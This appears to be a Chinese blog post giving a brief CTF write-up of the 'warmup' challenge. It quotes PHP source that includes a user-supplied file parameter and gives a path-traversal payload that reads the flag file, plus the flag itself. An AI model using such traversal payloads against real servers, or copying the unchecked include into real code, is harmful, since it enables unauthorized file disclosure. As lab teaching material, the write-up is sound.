zoukankan      html  css  js  c++  java
  • warmup

    warmup

    查看网页源代码发现有个source.php

    下面我们注意到一个file参数

    if (! empty($_REQUEST['file'])
            && is_string($_REQUEST['file'])
            && emmm::checkFile($_REQUEST['file'])
        ) {
            include $_REQUEST['file'];
            exit;
        } else {
            echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
        }  
    

    做过文件包含漏洞练习的小伙伴此刻就应该敏感了,这里面写了一个include函数,可以通过file来传递页面

    同时上面提示了一个hint.php,进去发现这么一段话:flag not here, and flag in ffffllllaaaagggg

    ?file=hint.php?/../../../../../ffffllllaaaagggg

    flag:flag{25e7bce6005c4e0c983fb97297ac6e5a}

  • 相关阅读:
    Postman post csrf_token
    CBV
    nginx+uWSGI+django部署web服务器
    JS绘图
    get_字段_display()
    limit_choices_to
    window.onload=function(){};
    模拟百度搜索项目
    事件冒泡
    解绑事件
  • 原文地址:https://www.cnblogs.com/sillage/p/13929590.html
Copyright © 2011-2022 走看看